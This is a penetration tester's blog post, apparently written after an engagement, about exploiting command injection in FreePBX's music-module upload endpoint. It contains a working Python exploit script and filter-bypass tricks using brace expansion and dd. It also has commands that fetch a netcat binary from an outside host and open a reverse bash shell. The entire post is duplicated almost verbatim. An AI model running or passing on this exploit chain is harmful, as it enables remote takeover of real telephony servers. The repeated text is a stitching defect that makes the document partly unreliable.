FreePBX Exploit and Brace Expansion

During an engagement, I’ve stumbled upon a box running a vulnerable version of FreePBX software. I tried a couple of exploits, but unfortunately, they did not work. The only exploit which worked is this. It is just curl command and it is not very comfortable to edit curl command every time.

So I wrote a simple Python script in order to run commands on the box:

import requests
from sys import argv
import base64

def main():
    url = 'http://' + argv[1] + '/admin/ajax.php?module=music&command=upload'
    cmd = argv[2]

    multipart_form_data = {
        'extension': (None, '0'),
        'language': (None,'en'),
        'filename': (None, 'fa.wav'),
        'codec[1]': (None, 'gsm'),
        'id': (None, '1'),
        'files[1]': ('$(' + cmd + ').wav', 'exploit by @simonuvarov')
    }

    headers = {
    'Referer': url + '/admin/ajax.php'
    }

    response = requests.post(url, files=multipart_form_data, headers=headers)

    print(response.text.replace(b"\\n", b"\n"))

if __name__ == '__main__':
    main()

Usage is simple: python freepbx.py <server> <command>. Sorry, no man pages this time.

The developers attempted to prevent shell command injection by performing a simple, yet inadequate, sanitization. Special chars are filtered and thus I was not able to run nc -nv <ip> <port> or echo aaa > file.txt. I was forced to use only one-word commands.

How can I compromise a box if I’m not allowed to use spaces? Easy, I can run commands without spaces at all by using {ls,-l} syntax which is called brace expansion.

Interesting things don’t stop here. I wanted to write files and I was not able to use / or \. The workaround is simple too - use the command echo "Hello world" | dd of=test.txt where of stands for “output file”.

Ok. Then I wanted to get a reverse shell but I still couldn’t use dots and slashes. However, I could run commands, write files and there’s command substitution in Linux of course. So I run:

python freepbx.py <server> "ls|{head,-n,1}|{cut,-c,5}|{dd,of=dot}"

Doing so, I wrote a dot symbol into a file from ls output (it was the 5th symbol of the first file in my case).

I did the same for the slash symbol, but I wrenched it from pwd command output this time:

python freepbx.py <server> "{pwd,}|{cut,-c,1}|{dd,of=slash}"

Now I was able to get reverse shell:

python freepbx.py <server> "{wget,exgq\$({cat,dot})pw\$({cat,slash})nc}"
python freepbx.py <server> "{chmod,+x,nc}"
python freepbx.py <server> "{\$({cat,dot})\$({cat,slash})nc,exgq\$({cat,dot})pw,4444,-e,\$({cat,slash})bin\$({cat,slash})bash}"

During an engagement, I’ve stumbled upon a box running a vulnerable version of FreePBX software. I tried a couple of exploits, but unfortunately, they did not work. The only exploit which worked is this. It is just curl command and it is not very comfortable to edit curl command every time.

So I wrote a simple Python script in order to run commands on the box:

import requests
from sys import argv
import base64

def main():
    url = 'http://' + argv[1] + '/admin/ajax.php?module=music&command=upload'
    cmd = argv[2]

    multipart_form_data = {
        'extension': (None, '0'),
        'language': (None,'en'),
        'filename': (None, 'fa.wav'),
        'codec[1]': (None, 'gsm'),
        'id': (None, '1'),
        'files[1]': ('$(' + cmd + ').wav', 'exploit by @simonuvarov')
    }

    headers = {
    'Referer': url + '/admin/ajax.php'
    }

    response = requests.post(url, files=multipart_form_data, headers=headers)

    print(response.text.replace(b"\\n", b"\n"))

if __name__ == '__main__':
    main()

Usage is simple: python freepbx.py <server> <command>. Sorry, no man pages this time.

The developers attempted to prevent shell command injection by performing a simple, yet inadequate, sanitization. Special chars are filtered and thus I was not able to run nc -nv <ip> <port> or echo aaa > file.txt. I was forced to use only one-word commands.

How can I compromise a box if I’m not allowed to use spaces? Easy, I can run commands without spaces at all by using {ls,-l} syntax which is called brace expansion.

Interesting things don’t stop here. I wanted to write files and I was not able to use / or \. The workaround is simple too - use the command echo "Hello world" | dd of=test.txt where of stands for “output file”.

Ok. Then I wanted to get a reverse shell but I still couldn’t use dots and slashes. However, I could run commands, write files and there’s command substitution in Linux of course. So I run:

python freepbx.py <server> "ls|{head,-n,1}|{cut,-c,5}|{dd,of=dot}"

Doing so, I wrote a dot symbol into a file from ls output (it was the 5th symbol of the first file in my case).

I did the same for the slash symbol, but I wrenched it from pwd command output this time:

python freepbx.py <server> "{pwd,}|{cut,-c,1}|{dd,of=slash}"

Now I was able to get reverse shell:

python freepbx.py <server> "{wget,exgq\$({cat,dot})pw\$({cat,slash})nc}"
python freepbx.py <server> "{chmod,+x,nc}"
python freepbx.py <server> "{\$({cat,dot})\$({cat,slash})nc,exgq\$({cat,dot})pw,4444,-e,\$({cat,slash})bin\$({cat,slash})bash}"